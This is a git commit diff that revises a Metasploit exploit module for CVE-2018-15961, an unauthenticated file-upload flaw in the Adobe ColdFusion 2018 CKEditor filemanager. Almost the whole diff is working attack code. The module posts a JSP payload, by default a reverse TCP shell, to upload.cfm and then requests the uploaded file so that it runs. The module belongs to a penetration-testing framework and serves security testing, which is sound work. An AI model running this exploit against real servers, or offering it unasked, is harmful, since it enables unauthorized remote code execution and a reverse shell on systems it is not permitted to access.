Fix targets and syntax changes
This commit is contained in:
parent
a63c057c3a
commit
b81f59e7b1
|
@ -18,89 +18,76 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
ColdFusion 2018 (July 12 release) allows unauthenticated remote
|
||||
attackers to upload and execute JSP files through the filemanager
|
||||
plugin.
|
||||
Tested on Adobe ColdFusion 2018.
|
||||
Tested on Adobe ColdFusion 2018.0.0.310739.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pete Freitag de Foundeo', # Vulnerability discovery
|
||||
'Vahagn vah_13 Vardanian', # First public PoC
|
||||
'Qazeer' # Metasploit module
|
||||
'Pete Freitag de Foundeo', # Vulnerability discovery
|
||||
'Vahagn vah_13 Vardanian', # First public PoC
|
||||
'Qazeer' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ "CVE", "2018-15961" ],
|
||||
[ "BID", "105314" ],
|
||||
[ "URL", "https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html" ]
|
||||
[ 'CVE', '2018-15961' ],
|
||||
[ 'BID', '105314' ],
|
||||
[ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Platform' => ['win', 'linux'],
|
||||
'Targets' =>
|
||||
'Platform' => %w{ linux win },
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Universal Linux Target',
|
||||
[ 'Java Universal',
|
||||
{
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'linux',
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Platform' => %w{ linux win },
|
||||
'Payload' => { 'DisableNops' => true },
|
||||
'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}
|
||||
}
|
||||
],
|
||||
[ 'Universal Windows Target',
|
||||
{
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
},
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'RPORT' => 8500 },
|
||||
'DisclosureDate' => 'Sep 11 2018'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [ false, 'The CKEditor path', '/cf_scripts/scripts/ajax/ckeditor' ]),
|
||||
])
|
||||
register_options [
|
||||
OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
|
||||
]
|
||||
end
|
||||
|
||||
def exploit
|
||||
filename = rand_text_alpha_upper(1..10) + '.jsp'
|
||||
|
||||
print_status("Uploading the JSP payload at #{datastore['TARGETURI']}/plugins/filemanager/uploadedFiles/#{filename}...")
|
||||
print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")
|
||||
|
||||
mime = Rex::MIME::Message.new
|
||||
mime.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
|
||||
mime.add_part("path", "text/plain", nil, "form-data; name=\"path\"")
|
||||
mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
|
||||
mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')
|
||||
|
||||
post_str = mime.to_s
|
||||
post_str.strip!
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], "plugins", "filemanager", "upload.cfm"),
|
||||
'version' => '1.1',
|
||||
'method' => 'POST',
|
||||
'ctype' => 'multipart/form-data; boundary=' + mime.bound,
|
||||
'data' => post_str,
|
||||
})
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),
|
||||
'version' => '1.1',
|
||||
'method' => 'POST',
|
||||
'ctype' => 'multipart/form-data; boundary=' + mime.bound,
|
||||
'data' => post_str,
|
||||
})
|
||||
|
||||
unless (res && res.code == 200)
|
||||
unless res && res.code == 200
|
||||
fail_with Failure::Unknown, 'Upload Failed...'
|
||||
end
|
||||
|
||||
print_good("Upload succeeded! Executing payload...")
|
||||
print_good('Upload succeeded! Executing payload...')
|
||||
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
|
||||
'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
|
||||
'method' => 'GET'
|
||||
}, 5)
|
||||
|
||||
send_request_cgi(
|
||||
{
|
||||
'uri' => "#{datastore['TARGETURI']}/plugins/filemanager/uploadedFiles/#{filename}",
|
||||
'method' => 'GET'
|
||||
}, 5)
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue